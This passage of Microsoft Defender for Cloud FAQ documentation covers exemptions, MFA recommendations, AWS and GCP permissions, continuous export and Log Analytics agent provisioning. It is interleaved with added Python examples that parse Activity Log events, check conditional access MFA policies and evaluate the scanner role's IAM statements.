eventTimestamp and the subscription-scoped id.] 
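As an added illustration (not code from the Microsoft documentation), the following script applies the lookup described above to Activity Log event JSON: it keeps only completed "Update pricing settings" operations and takes the initiator from the name claim, falling back to the caller field and then to the app id when a user name is absent. The sample events, ids and user names are constructed; the resource provider operation Microsoft.Security/pricings/write is assumed to be the one behind the portal's "Update pricing settings" row.

```python
"""Find who changed Defender for Cloud pricing settings from Activity Log event JSON."""

# The portal's "Event initiated by" column comes from "caller"; when that is empty or
# only an object id, the claims block in the event JSON still names the identity.
NAME_CLAIM = "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name"
# Assumed resource provider operation behind the portal's "Update pricing settings" row.
PRICING_OP = "Microsoft.Security/pricings/write"

# Constructed sample events (placeholder ids, sample users); same shape as the
# portal's JSON tab, trimmed to the fields used here.
SAMPLE_EVENTS = [
    {   # 'Started' record of a pricing change; its 'Succeeded' record follows
        "operationName": {"value": PRICING_OP, "localizedValue": "Update pricing settings"},
        "status": {"value": "Started"},
        "caller": "kbell@contoso.com",
        "claims": {NAME_CLAIM: "kbell@contoso.com"},
        "eventTimestamp": "2020-11-24T08:12:46.350Z",
        "subscriptionId": "00000000-0000-0000-0000-000000000001",
    },
    {
        "operationName": {"value": PRICING_OP, "localizedValue": "Update pricing settings"},
        "status": {"value": "Succeeded"},
        "caller": "kbell@contoso.com",
        "claims": {NAME_CLAIM: "kbell@contoso.com"},
        "eventTimestamp": "2020-11-24T08:12:47.100Z",
        "subscriptionId": "00000000-0000-0000-0000-000000000001",
    },
    {   # unrelated, failed network change by a service principal
        "operationName": {"value": "Microsoft.Network/virtualNetworks/subnets/write",
                          "localizedValue": "Create or Update Virtual Network Subnet"},
        "status": {"value": "Failed"},
        "caller": "00000000-0000-0000-0000-0000000000aa",
        "claims": {"appid": "00000000-0000-0000-0000-0000000000bb"},
        "eventTimestamp": "2020-11-24T08:13:02.000Z",
        "subscriptionId": "00000000-0000-0000-0000-000000000001",
    },
    {   # pricing change by an automation identity: no name claim and no caller
        "operationName": {"value": PRICING_OP, "localizedValue": "Update pricing settings"},
        "status": {"value": "Succeeded"},
        "caller": "",
        "claims": {"appid": "00000000-0000-0000-0000-0000000000bb"},
        "eventTimestamp": "2020-12-13T15:36:46.350Z",
        "subscriptionId": "00000000-0000-0000-0000-000000000002",
    },
]


def who_initiated(event):
    """Initiator of an event: the name claim, else 'caller', else the app id."""
    claims = event.get("claims") or {}
    if claims.get(NAME_CLAIM):
        return claims[NAME_CLAIM]
    if event.get("caller"):
        return event["caller"]
    if claims.get("appid"):
        return "app:" + claims["appid"]
    return "unknown"


def pricing_changes(events):
    """(timestamp, subscription, initiator) for each completed pricing-settings write,
    oldest first. 'Started' records are skipped so each change is counted once."""
    rows = []
    for ev in events:
        op = (ev.get("operationName") or {}).get("value", "")
        if op.lower() != PRICING_OP.lower():
            continue
        if (ev.get("status") or {}).get("value") != "Succeeded":
            continue
        rows.append((ev.get("eventTimestamp", ""), ev.get("subscriptionId", ""), who_initiated(ev)))
    return sorted(rows)


if __name__ == "__main__":
    for ts, sub, who in pricing_changes(SAMPLE_EVENTS):
        print(f"{ts}  {sub}  {who}")
```

To run it against real data, feed the script the JSON list returned for your subscription's Activity Log instead of SAMPLE_EVENTS.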


What happens when one recommendation is in multiple policy initiatives? 


Sometimes, a security recommendation appears in more than one policy initiative. If 
you've got multiple instances of the same recommendation assigned to the same 
subscription, and you create an exemption for the recommendation, it will affect all of 
the initiatives that you have permission to edit. 


If you try to create an exemption for this recommendation, you'll see one of the two 
following messages: 


• If you have the necessary permissions to edit both initiatives, you'll see: 

This recommendation is included in several policy initiatives: [initiative names 
separated by comma]. Exemptions will be created on all of them. 

• If you don't have sufficient permissions on both initiatives, you'll see this message 
instead: 

You have limited permissions to apply the exemption on all the policy initiatives, the 
exemptions will be created only on the initiatives with sufficient permissions. 


Are there any recommendations that don't support exemption? 


These generally available recommendations don't support exemption: 


• All advanced threat protection types should be enabled in SQL managed instance 
advanced data security settings 
• All advanced threat protection types should be enabled in SQL server advanced 
data security settings 
• Container CPU and memory limits should be enforced 
• Container images should be deployed from trusted registries only 
• Container with privilege escalation should be avoided 
• Containers sharing sensitive host namespaces should be avoided 
• Containers should listen on allowed ports only 
• Default IP Filter Policy should be Deny 
• Immutable (read-only) root filesystem should be enforced for containers 
• IoT Devices - Open Ports On Device 
• IoT Devices - Permissive firewall policy in one of the chains was found 
• IoT Devices - Permissive firewall rule in the input chain was found 
• IoT Devices - Permissive firewall rule in the output chain was found 
• IP Filter rule large IP range 
• Least privileged Linux capabilities should be enforced for containers 
• Overriding or disabling of containers AppArmor profile should be restricted 
• Privileged containers should be avoided 
• Running containers as root user should be avoided 
• Services should listen on allowed ports only 
• SQL servers should have a Microsoft Entra administrator provisioned 
• Usage of host networking and ports should be restricted 
• Usage of pod HostPath volume mounts should be restricted to a known list to 
restrict node access from compromised containers 


We're already using conditional access (CA) policy to enforce MFA. Why do we 
still get the Defender for Cloud recommendations? 


To investigate why the recommendations are still being generated, verify the following 
configuration options in your MFA CA policy: 


• You've included the accounts in the Users section of your MFA CA policy (or one of 
the groups in the Groups section) 
• The Azure Management app ID (797f4846-ba00-4fd7-ba43-dac1f8f63013), or all 
apps, are included in the Apps section of your MFA CA policy 
• The Azure Management app ID isn't excluded in the Apps section of your MFA CA 
policy 
• OR condition is used with only MFA, or AND condition is used with MFA 
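The four checks above can be run mechanically against a CA policy object. The function below is an added example (not Microsoft's code) that reads the policy in the field layout of the Microsoft Graph conditionalAccessPolicy resource (conditions.users, conditions.applications, grantControls) and returns every condition that fails for a given account; it also adds one check the list above does not state, that the policy is in the enabled state. The sample policy, account ids and group id are constructed.

```python
"""Check a Microsoft Entra conditional access (CA) policy against the conditions that
Defender for Cloud's MFA recommendations expect."""
import copy

# App ID given on the page for "Azure Management".
AZURE_MANAGEMENT_APP_ID = "797f4846-ba00-4fd7-ba43-dac1f8f63013"


def mfa_policy_gaps(policy, account_id, account_groups=()):
    """Reasons this CA policy would not satisfy Defender for Cloud's MFA check for the
    given account; an empty list means every condition holds.
    `policy` uses the Microsoft Graph conditionalAccessPolicy field names."""
    gaps = []
    conditions = policy.get("conditions") or {}

    # 1. The account must be in Users, or in one of the Groups, of the policy.
    users = conditions.get("users") or {}
    include_users = users.get("includeUsers") or []
    include_groups = users.get("includeGroups") or []
    covered = ("All" in include_users or account_id in include_users
               or any(g in include_groups for g in account_groups))
    if not covered:
        gaps.append("account is not in the Users section (or one of its Groups)")

    # 2. Azure Management (or all apps) must be included ...
    apps = conditions.get("applications") or {}
    include_apps = apps.get("includeApplications") or []
    exclude_apps = apps.get("excludeApplications") or []
    if "All" not in include_apps and AZURE_MANAGEMENT_APP_ID not in include_apps:
        gaps.append("Azure Management app (or all apps) is not in the Apps section")
    # 3. ... and must not be excluded.
    if AZURE_MANAGEMENT_APP_ID in exclude_apps:
        gaps.append("Azure Management app is excluded in the Apps section")

    # 4. Grant controls: OR with only MFA, or AND with MFA among the controls.
    grant = policy.get("grantControls") or {}
    operator = (grant.get("operator") or "").upper()
    controls = grant.get("builtInControls") or []
    requires_mfa = ((operator == "OR" and controls == ["mfa"])
                    or (operator == "AND" and "mfa" in controls))
    if not requires_mfa:
        gaps.append("grant controls are not 'OR with only MFA' or 'AND with MFA'")

    # Added check beyond the page's list: a disabled or report-only policy enforces nothing.
    if policy.get("state") != "enabled":
        gaps.append("policy state is not 'enabled'")
    return gaps


# Constructed sample policy (the group id is a placeholder).
SAMPLE_POLICY = {
    "displayName": "Require MFA for Azure management",
    "state": "enabled",
    "conditions": {
        "users": {"includeUsers": [], "includeGroups": ["grp-cloud-admins"]},
        "applications": {"includeApplications": [AZURE_MANAGEMENT_APP_ID],
                         "excludeApplications": []},
    },
    "grantControls": {"operator": "OR", "builtInControls": ["mfa"]},
}


def weakened_policy():
    """The same policy with two common mistakes: Azure Management excluded from the
    apps, and an OR grant that accepts a compliant device instead of MFA."""
    p = copy.deepcopy(SAMPLE_POLICY)
    p["conditions"]["applications"]["includeApplications"] = ["All"]
    p["conditions"]["applications"]["excludeApplications"] = [AZURE_MANAGEMENT_APP_ID]
    p["grantControls"]["builtInControls"] = ["mfa", "compliantDevice"]
    return p


if __name__ == "__main__":
    print(mfa_policy_gaps(SAMPLE_POLICY, "user-alice", ["grp-cloud-admins"]))
    print(mfa_policy_gaps(SAMPLE_POLICY, "user-bob"))
    print(mfa_policy_gaps(weakened_policy(), "user-alice", ["grp-cloud-admins"]))
```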


We're using a third-party MFA tool to enforce MFA. Why do we still get the 
Defender for Cloud recommendations? 


Defender for Cloud's MFA recommendations don't support third-party MFA tools (for 
example, DUO). 


If the recommendations are irrelevant for your organization, consider marking them as 
"mitigated" as described in Exempting resources and recommendations from your 
secure score. You can also disable a recommendation. 


Why does Defender for Cloud show user accounts without permissions on the 
subscription as "requiring MFA"? 


Defender for Cloud's MFA recommendations refer to Azure RBAC roles and the Azure 
classic subscription administrators role. Verify that none of the accounts have such roles. 


We're enforcing MFA with PIM. Why are PIM accounts shown as noncompliant? 


Defender for Cloud's MFA recommendations currently don't support PIM accounts. 
You can add these accounts to a CA Policy in the Users/Group section. 


Can I exempt or dismiss some of the accounts? 


The capability to exempt some accounts that don't use MFA is available on the new 
recommendations in preview: 


• Accounts with owner permissions on Azure resources should be MFA enabled 
• Accounts with write permissions on Azure resources should be MFA enabled 
• Accounts with read permissions on Azure resources should be MFA enabled 


To exempt account(s), follow these steps: 


1. Select an MFA recommendation associated with an unhealthy account. 
2. In the Accounts tab, select an account to exempt. 

3. Select the three dots button, then select Exempt account. 

4. Select a scope and exemption reason. 


If you would like to see which accounts are exempt, navigate to Exempted accounts for 
each recommendation. 


Tip 


When you exempt an account, it won't be shown as unhealthy and won't cause a 
subscription to appear unhealthy. 


Are there any limitations to Defender for Cloud's identity and access protections? 


There are some limitations to Defender for Cloud's identity and access protections: 


• Identity recommendations aren't available for subscriptions with more than 6,000 
accounts. In these cases, these subscriptions are listed under the Not 
applicable tab. 
• Identity recommendations aren't available for Cloud Solution Provider (CSP) 
partner's admin agents. 
• Identity recommendations don't identify accounts that are managed with a 
privileged identity management (PIM) system. If you're using a PIM tool, you might 
see inaccurate results in the Manage access and permissions control. 
• Identity recommendations don't support Microsoft Entra conditional access 
policies with included Directory Roles instead of users and groups. 


What operating systems for my EC2 instances are supported? 


For a list of the AMIs with the SSM Agent preinstalled, see this page in the AWS docs. 


For other operating systems, the SSM Agent should be installed manually using the 
following instructions: 


• Install SSM Agent for a hybrid environment (Windows) 
• Install SSM Agent for a hybrid environment (Linux) 


For the CSPM plan, what IAM permissions are needed to discover AWS resources? 


The following IAM permissions are needed to discover AWS resources: 

DataCollector | AWS Permissions 
API Gateway | apigateway:GET 
Application Auto Scaling | application-autoscaling:Describe* 
Auto scaling | autoscaling-plans:Describe*, autoscaling:Describe* 
Certificate manager | acm-pca:Describe*, acm-pca:List*, acm:Describe*, acm:List* 
CloudFormation | cloudformation:Describe*, cloudformation:List* 
CloudFront | cloudfront:DescribeFunction, cloudfront:GetDistribution, cloudfront:GetDistributionConfig, cloudfront:List* 
CloudTrail | cloudtrail:Describe*, cloudtrail:GetEventSelectors, cloudtrail:List*, cloudtrail:LookupEvents 
CloudWatch | cloudwatch:Describe*, cloudwatch:List* 
CloudWatch logs | logs:DescribeLogGroups, logs:DescribeMetricFilters 
CodeBuild | codebuild:DescribeCodeCoverages, codebuild:DescribeTestCases, codebuild:List* 
Config Service | config:Describe*, config:List* 
DMS - database migration service | dms:Describe*, dms:List* 
DAX | dax:Describe* 
DynamoDB | dynamodb:Describe*, dynamodb:List* 
EC2 | ec2:Describe*, ec2:GetEbsEncryptionByDefault 
ECR | ecr:Describe*, ecr:List* 
ECS | ecs:Describe*, ecs:List* 
EFS | elasticfilesystem:Describe* 
EKS | eks:Describe*, eks:List* 
Elastic Beanstalk | elasticbeanstalk:Describe*, elasticbeanstalk:List* 
ELB - elastic load balancing (v1/2) | elasticloadbalancing:Describe* 
Elastic search | es:Describe*, es:List* 
EMR - elastic map reduce | elasticmapreduce:Describe*, elasticmapreduce:GetBlockPublicAccessConfiguration, elasticmapreduce:List*, elasticmapreduce:View* 
GuardDuty | guardduty:DescribeOrganizationConfiguration, guardduty:DescribePublishingDestination, guardduty:List* 
IAM | iam:Generate*, iam:Get*, iam:List*, iam:Simulate* 
KMS | kms:Describe*, kms:List* 
Lambda | lambda:GetPolicy, lambda:List* 
Network firewall | network-firewall:DescribeFirewall, network-firewall:DescribeFirewallPolicy, network-firewall:DescribeLoggingConfiguration, network-firewall:DescribeResourcePolicy, network-firewall:DescribeRuleGroup, network-firewall:DescribeRuleGroupMetadata, network-firewall:ListFirewallPolicies, network-firewall:ListFirewalls, network-firewall:ListRuleGroups, network-firewall:ListTagsForResource 
RDS | rds:Describe*, rds:List* 
RedShift | redshift:Describe* 
S3 and S3Control | s3:DescribeJob, s3:GetEncryptionConfiguration, s3:GetBucketPublicAccessBlock, s3:GetBucketTagging, s3:GetBucketLogging, s3:GetBucketAcl, s3:GetBucketLocation, s3:GetBucketPolicy, s3:GetReplicationConfiguration, s3:GetAccountPublicAccessBlock, s3:GetObjectAcl, s3:GetObjectTagging, s3:List* 
SageMaker | sagemaker:Describe*, sagemaker:GetSearchSuggestions, sagemaker:List*, sagemaker:Search 
Secret manager | secretsmanager:Describe*, secretsmanager:List* 
Simple notification service - SNS | sns:Check*, sns:List* 
SSM | ssm:Describe*, ssm:List* 
SQS | sqs:List*, sqs:Receive* 
STS | sts:GetCallerIdentity 
WAF | waf-regional:Get*, waf-regional:List*, waf:List*, wafv2:CheckCapacity, wafv2:Describe*, wafv2:List* 


Is there an API for connecting my GCP resources to Defender for Cloud? 


Yes. To create, edit, or delete Defender for Cloud cloud connectors with a REST API, see 
the details of the Connectors API. 


What GCP regions are supported by Defender for Cloud? 


Defender for Cloud supports and scans all available regions on GCP public cloud. 


Does workflow automation support any business continuity or disaster recovery 
(BCDR) scenarios? 


When preparing your environment for BCDR scenarios, where the target resource is 
experiencing an outage or other disaster, it's the organization's responsibility to prevent 
data loss by establishing backups according to the guidelines from Azure Event Hubs, 
Log Analytics workspace, and Logic Apps. 


For every active automation, we recommend you create an identical (disabled) 
automation and store it in a different location. When there's an outage, you can enable 
these backup automations and maintain normal operations. 


Learn more about Business continuity and disaster recovery for Azure Logic Apps. 


What are the costs involved in exporting data? 


There's no cost for enabling a continuous export. Costs might be incurred for ingestion 
and retention of data in your Log Analytics workspace, depending on your configuration 
there. 


Many alerts are only provided when you've enabled Defender plans for your resources. 
A good way to preview the alerts you'll get in your exported data is to see the alerts 
shown in Defender for Cloud's pages in the Azure portal. 


Learn more about Log Analytics workspace pricing. 
Learn more about Azure Event Hubs pricing. 


For general information about Defender for Cloud pricing, see the pricing page. 


Does the continuous export include data about the current state of all resources? 

No. Continuous export is built for streaming of events: 


• Alerts received before you enabled export won't be exported. 
• Recommendations are sent whenever a resource's compliance state changes. For 
example, when a resource turns from healthy to unhealthy. Therefore, as with 
alerts, recommendations for resources that haven't changed state since you 
enabled export won't be exported. 
• Secure score per security control or subscription is sent when a security control's 
score changes by 0.01 or more. 
• Regulatory compliance status is sent when the status of the resource's compliance 
changes. 


Why are recommendations sent at different intervals? 


Different recommendations have different compliance evaluation intervals, which can 
range from every few minutes to every few days. So, the amount of time that it takes for 
recommendations to appear in your exports varies. 


How can I get an example query for a recommendation? 


To get an example query for a recommendation, open the recommendation in Defender 
for Cloud, select Open query, and then select Query returning security findings. 


[Screenshot: the recommendation page for "Container registry images should have 
vulnerability findings resolved (powered by Qualys)", showing the Exempt, Disable rule, 
View policy definition and Open query actions; the Open query menu offers "Query 
returning affected resources" and "Query returning security findings".] 


Does continuous export support any business continuity or disaster recovery 
(BCDR) scenarios? 


Continuous export can help you prepare for BCDR scenarios where the target 
resource is experiencing an outage or other disaster. However, it's the organization's 
responsibility to prevent data loss by establishing backups according to the guidelines 
from Azure Event Hubs, Log Analytics workspace, and Logic Apps. 


Learn more in Azure Event Hubs - Geo-disaster recovery. 


Next steps 


Learn about what's new in Defender for Cloud 


Common questions about permissions in Defender for Cloud 


FAQ 


How do permissions work in Microsoft Defender for Cloud? 


Microsoft Defender for Cloud uses Azure role-based access control (Azure RBAC), which 
provides built-in roles that can be assigned to users, groups, and services in Azure. 


Defender for Cloud assesses the configuration of your resources to identify security 
issues and vulnerabilities. In Defender for Cloud, you only see information related to a 
resource when you're assigned the role of Owner, Contributor, or Reader for the 
subscription or resource group that a resource belongs to. 


See Permissions in Microsoft Defender for Cloud to learn more about roles and allowed 
actions in Defender for Cloud. 


Who can modify a security policy? 


To modify a security policy, you must be a Security Admin or an Owner or Contributor of 
that subscription. 


To learn how to configure a security policy, see Setting security policies in Microsoft 
Defender for Cloud. 


Which permissions are used by agentless scanning? 


The roles and permissions used by Defender for Cloud to perform agentless scanning 
on your Azure, AWS, and GCP environments are listed here. In Azure, these permissions 
are automatically added to your subscriptions when you enable agentless scanning. In 
AWS, these permissions are added to the CloudFormation stack in your AWS connector 
and in GCP permissions are added to the onboarding script in your GCP connector. 


• Azure permissions - The built-in role "VM scanner operator" has read-only 
permissions for VM disks that are required for the snapshot process. The detailed 
list of permissions is: 

  ○ Microsoft.Compute/disks/read 
  ○ Microsoft.Compute/disks/beginGetAccess/action 
  ○ Microsoft.Compute/virtualMachines/instanceView/read 
  ○ Microsoft.Compute/virtualMachines/read 
  ○ Microsoft.Compute/virtualMachineScaleSets/instanceView/read 
  ○ Microsoft.Compute/virtualMachineScaleSets/read 
  ○ Microsoft.Compute/virtualMachineScaleSets/virtualMachines/read 
  ○ Microsoft.Compute/virtualMachineScaleSets/virtualMachines/instanceView/read 


• AWS permissions - The role "VmScanner" is assigned to the scanner when you 
enable agentless scanning. This role has the minimal permission set to create and 
clean up snapshots (scoped by tag) and to verify the current state of the VM. The 
detailed permissions are: 


Attribute | Value 
SID | VmScannerDeleteSnapshotAccess 
Actions | ec2:DeleteSnapshot 
Conditions | "StringEquals": {"ec2:ResourceTag/CreatedBy": "Microsoft Defender for Cloud"} 
Resources | arn:aws:ec2:::snapshot/ 
Effect | Allow 

Attribute | Value 
SID | VmScannerAccess 
Actions | ec2:ModifySnapshotAttribute, ec2:DeleteTags, ec2:CreateTags, ec2:CreateSnapshots, ec2:CopySnapshots, ec2:CreateSnapshot 
Conditions | None 
Resources | arn:aws:ec2:::instance/, arn:aws:ec2:::snapshot/, arn:aws:ec2:::volume/ 
Effect | Allow 

Attribute | Value 
SID | VmScannerVerificationAccess 
Actions | ec2:DescribeSnapshots, ec2:DescribeInstanceStatus 
Conditions | None 
Effect | Allow 

Attribute | Value 
SID | VmScannerEncryptionKeyCreation 
Actions | kms:CreateKey 
Conditions | None 
Effect | Allow 

Attribute | Value 
SID | VmScannerEncryptionKeyManagement 
Actions | kms:TagResource, kms:GetKeyRotationStatus, kms:PutKeyPolicy, kms:GetKeyPolicy, kms:CreateAlias, kms:ListResourceTags 
Conditions | None 
Resources | arn:aws:kms::${AWS::AccountId}:key/, arn:aws:kms:*:${AWS::AccountId}:alias/DefenderForCloudKey 
Effect | Allow 

Attribute | Value 
SID | VmScannerEncryptionKeyUsage 
Actions | kms:GenerateDataKeyWithoutPlaintext, kms:DescribeKey, kms:RetireGrant, kms:CreateGrant, kms:ReEncryptFrom 
Conditions | None 
Resources | arn:aws:kms::${AWS::AccountId}:key/ 
Effect | Allow 


• GCP permissions - During onboarding, a new custom role is created with the minimal 
permissions required to get instance status and create snapshots. On top of that, 
permissions on an existing GCP KMS role are granted to support scanning disks 
that are encrypted with CMEK. The roles are: 

  ○ roles/MDCAgentlessScanningRole, granted to Defender for Cloud's service 
account, with the permissions compute.disks.createSnapshot and compute.instances.get 
  ○ roles/cloudkms.cryptoKeyEncrypterDecrypter, granted to Defender for Cloud's 
compute engine service agent 
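The value of the tag condition on the AWS VmScanner role is easiest to see by evaluating requests against its statements. The evaluator below is an added example (not Microsoft's code or AWS's policy engine): it transcribes the role's EC2 statements, matches actions and resource ARNs with IAM-style wildcards, applies the StringEquals condition, and denies by default. Resource ARN wildcards are assumed (the rendering above drops them), the KMS statements are left out, and the request ARNs and ids are constructed.

```python
"""Evaluate requests against the EC2 statements of the VmScanner role to show how the
CreatedBy tag condition limits snapshot deletion to the scanner's own snapshots."""
from fnmatch import fnmatchcase

# Statements transcribed from the role description above. Resource ARN wildcards are
# assumed (the page's rendering dropped them); the KMS statements are omitted.
VM_SCANNER_STATEMENTS = [
    {
        "Sid": "VmScannerDeleteSnapshotAccess",
        "Effect": "Allow",
        "Action": ["ec2:DeleteSnapshot"],
        "Resource": ["arn:aws:ec2:*::snapshot/*"],
        "Condition": {"StringEquals": {"ec2:ResourceTag/CreatedBy": "Microsoft Defender for Cloud"}},
    },
    {
        "Sid": "VmScannerAccess",
        "Effect": "Allow",
        "Action": ["ec2:ModifySnapshotAttribute", "ec2:DeleteTags", "ec2:CreateTags",
                   "ec2:CreateSnapshots", "ec2:CopySnapshots", "ec2:CreateSnapshot"],
        "Resource": ["arn:aws:ec2:*:*:instance/*", "arn:aws:ec2:*::snapshot/*",
                     "arn:aws:ec2:*:*:volume/*"],
    },
    {
        "Sid": "VmScannerVerificationAccess",
        "Effect": "Allow",
        "Action": ["ec2:DescribeSnapshots", "ec2:DescribeInstanceStatus"],
        "Resource": ["*"],  # assumed: Describe* calls are not resource-scoped
    },
]


def _matches_any(value, patterns):
    # IAM action and resource patterns use '*' wildcards; fnmatchcase stays case-sensitive.
    return any(fnmatchcase(value, pattern) for pattern in patterns)


def _condition_holds(condition, context):
    # Only StringEquals appears in these statements. Every key must match exactly; a key
    # absent from the request context (an untagged snapshot) makes the condition false.
    for key, expected in (condition.get("StringEquals") or {}).items():
        if context.get(key) != expected:
            return False
    return True


def allowing_statement(action, resource, context=None, statements=VM_SCANNER_STATEMENTS):
    """Sid of the first Allow statement matching the request, or None (deny by default).
    The role carries no explicit Deny statements, so no deny pass is needed."""
    context = context or {}
    for st in statements:
        if st.get("Effect") != "Allow":
            continue
        if not _matches_any(action, st["Action"]):
            continue
        if not _matches_any(resource, st["Resource"]):
            continue
        if not _condition_holds(st.get("Condition") or {}, context):
            continue
        return st["Sid"]
    return None


def is_allowed(action, resource, context=None):
    return allowing_statement(action, resource, context) is not None


# Constructed sample requests (placeholder account and resource ids).
SCANNER_TAG = {"ec2:ResourceTag/CreatedBy": "Microsoft Defender for Cloud"}
SNAPSHOT = "arn:aws:ec2:us-east-1::snapshot/snap-0123456789abcdef0"
VOLUME = "arn:aws:ec2:us-east-1:123456789012:volume/vol-0123456789abcdef0"
INSTANCE = "arn:aws:ec2:us-east-1:123456789012:instance/i-0123456789abcdef0"

if __name__ == "__main__":
    for action, resource, ctx in [
        ("ec2:DeleteSnapshot", SNAPSHOT, SCANNER_TAG),  # scanner-created: allowed
        ("ec2:DeleteSnapshot", SNAPSHOT, {}),           # untagged snapshot: denied
        ("ec2:DeleteSnapshot", SNAPSHOT, {"ec2:ResourceTag/CreatedBy": "backup-job"}),
        ("ec2:CreateSnapshot", VOLUME, {}),             # allowed, no condition
        ("ec2:DescribeInstanceStatus", "*", {}),        # allowed
        ("ec2:TerminateInstances", INSTANCE, {}),       # no statement: denied
    ]:
        print(f"{action:28} {allowing_statement(action, resource, ctx) or 'DENY'}")
```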


What is the minimum SAS policy permissions required when exporting data to 
Azure Event Hubs? 


Send is the minimum SAS policy permissions required. For step-by-step instructions, see 
Step 1: Create an Event Hubs namespace and event hub with send permissions in this 
article. 


Common questions about data collection, agents, and workspaces 


FAQ 


Defender for Cloud collects data from your Azure virtual machines (VMs), Virtual 
Machine Scale Sets, IaaS containers, and non-Azure computers (including on-premises 
machines) to monitor for security vulnerabilities and threats. The Log Analytics agent 
collects the data: it reads various security-related configurations and event logs from 
the machine and copies them to your workspace for analysis. 


Data collection 


How do I enable data collection? 


Data collection is automatically turned on when you enable a Defender plan that 
requires a monitoring component. 


What happens when data collection is enabled? 


When automatic provisioning is enabled, Defender for Cloud uses the Log Analytics 
agent on all supported Azure VMs and any new ones that are created. Automatic 
provisioning is recommended but manual agent installation is also available. Learn how 
to install the Log Analytics agent extension. 


The agent enables the process creation event 4688 and the CommandLine field inside 
event 4688. New processes created on the VM get recorded by the EventLog and 
monitored by Defender for Cloud's detection services. For more information on the 
details recorded for each new process, see description fields in 4688. The agent also 
collects the 4688 events created on the VM and stores them in search. 


The agent also enables data collection for Adaptive application controls: Defender for 
Cloud configures a local AppLocker policy in Audit mode to allow all applications. This 
policy causes AppLocker to generate events, which are then collected and used by 
Defender for Cloud. It's important to note that this policy isn't configured on any 
machines on which there's already a configured AppLocker policy. 


When Defender for Cloud detects suspicious activity on the VM, the customer receives 
an email notification if security contact information has been provided. An alert is also 
visible in Defender for Cloud's security alerts dashboard. 


Agents 


What is the Log Analytics agent? 


To monitor for security vulnerabilities and threats, Microsoft Defender for Cloud 
depends on the Log Analytics Agent - this agent is the same used by the Azure Monitor 
service. The agent is sometimes referred to as the Azure Monitor Agent (or AMA). 


The agent collects various security-related configuration details and event logs from 
connected machines, and then copies the data to your Log Analytics workspace for 
further analysis. Examples of such data are: operating system type and version, 
operating system logs (Windows event logs), running processes, machine name, IP 
addresses, and logged in user. 


Ensure your machines are running one of the supported operating systems for the agent 
as described on the following pages: 


• Log Analytics agent for Windows supported operating systems 
• Log Analytics agent for Linux supported operating systems 


Learn more about the data collected by the Log Analytics agent. 


What qualifies a VM for automatic provisioning of the Log Analytics agent installation? 


Windows or Linux IaaS VMs qualify if: 


• The Log Analytics agent extension isn't currently installed on the VM. 
• The VM is in running state. 
• The Windows or Linux Azure Virtual Machine Agent is installed. 
• The VM isn't used as an appliance such as web application firewall or next 
generation firewall. 


What security events does the Log Analytics agent collect? 


For a full list of the security events collected by the agent, see What event types are 
stored for the "Common" and "Minimal" security events settings?. 


Important 


For some services, such as Azure Firewall, logging for a resource that produces 
numerous logs can consume storage in your Log Analytics workspace. Make sure 
you use verbose logging only when necessary. 


What if the Log Analytics agent was already installed as an extension on the VM? 


When the Monitoring Agent is installed as an extension, the extension configuration 
allows reporting to only a single workspace. Defender for Cloud doesn't override 
existing connections to user workspaces. Defender for Cloud stores security data from a 
VM in a workspace that is already connected when the "Security" or 
"SecurityCenterFree" solution is installed on it. Defender for Cloud may upgrade the 
extension version to the latest version in this process. 


For more information, see Automatic provisioning in cases of a pre-existing agent 
installation. 


What if a Log Analytics agent is directly installed 
on the machine but not as an extension (Direct 
Agent)? 

If the Log Analytics agent is installed directly on the VM (not as an Azure extension),
Defender for Cloud installs the Log Analytics agent extension, and may upgrade the Log
Analytics agent to the latest version.


The agent installed continues to report to its already configured workspaces, and 
reports to the workspace configured in Defender for Cloud. (Multi-homing is supported 
on Windows machines.) 


For custom user workspaces, you need to install the "Security" or "SecurityCenterFree"
solution on it so that Defender for Cloud can process events from VMs and computers
reporting to that workspace.


For Linux machines, agent multi-homing isn't yet supported. If an existing agent
installation is detected, Defender for Cloud doesn't automatically use an agent or
change the machine's configuration.


For existing machines on subscriptions onboarded to Defender for Cloud before March
17, 2019, agent multi-homing isn't yet supported. If an existing agent installation is
detected, Defender for Cloud doesn't automatically use an agent or change the
machine's configuration. For these machines, see the "Resolve monitoring agent health
issues on your machines" recommendation to resolve the agent installation issues on
these machines.


For more information, see the next section What happens if a System Center Operations 
Manager or OMS direct agent is already installed on my VM? 


What if a System Center Operations Manager 
agent is already installed on my VM? 


Defender for Cloud implements an Azure Policy that doesn't allow the Log Analytics
agent to be installed while the System Center Operations Manager Agent is installed on
the machine. Both agents have the ability to multi-home and report to the System
Center Operations Manager and the Log Analytics workspace. The Operations Manager
agent and Log Analytics agent share common run-time libraries. Note: if version 2012
of the Operations Manager agent is installed, don't turn on automatic provisioning
(manageability capabilities can be lost when the Operations Manager server is also
version 2012).


What is the effect of removing these extensions? 


If you remove the Microsoft Monitoring Extension, Defender for Cloud isn't able to
collect security data from the VM and some security recommendations and alerts are
unavailable. Within 24 hours, Defender for Cloud determines that the VM is missing the
extension and reinstalls the extension.


How do I stop the automatic agent installation
and workspace creation? 


Deploying extensions with Defender for Cloud is highly recommended in order to get
security alerts and recommendations about system updates, OS vulnerabilities, and
endpoint protection. Turning off extensions limits these alerts and recommendations.


However, you can disable automatic provisioning for a specific agent or extension.


To disable automatic provisioning for a specific agent or extension:


1. From the Azure portal, open Defender for Cloud and select Environment
settings.


2. Select the relevant subscription. 


3. In the Monitoring coverage column of the Defender for Server plan, select 
Settings. 


[Screenshot: Settings | Defender plans page, showing the Monitoring coverage column of the Cloud Workload Protection (CWP) plans and its Settings link.]


4. Turn off the extension you want to stop being automatically provisioned. 


[Screenshot: Settings & monitoring page for the Servers plan, listing the components Log Analytics agent/Azure Monitor agent, Vulnerability assessment for machines, Endpoint protection, and Agentless scanning for machines (preview), each with its status toggle.]


5. Select Save. 


Should I opt out of the automatic agent
installation and workspace creation? 


Note


Be sure to review sections What are the implications of opting out? and 
recommended steps when opting out if you choose to opt out of automatic 
provisioning. 


You may want to opt out of automatic provisioning if these scenarios apply to you: 


• Automatic agent installation by Defender for Cloud applies to the entire
subscription. You can't apply automatic installation to a subset of VMs. If there are
critical VMs that can't be installed with the Log Analytics agent, then you should
opt out of automatic provisioning.


• Installation of the Log Analytics agent extension updates the agent's version. This
applies to a direct agent and a System Center Operations Manager agent (in the
latter, the Operations Manager and Log Analytics agent share common runtime
libraries, which are updated in the process). If the installed Operations Manager
agent is version 2012 and is upgraded, manageability capabilities can be lost when
the Operations Manager server is also version 2012. Consider opting out of
automatic provisioning if the installed Operations Manager agent is version 2012.


• If you want to avoid creation of multiple workspaces per subscription and you have
your own custom workspace within the subscription, then you have two options:


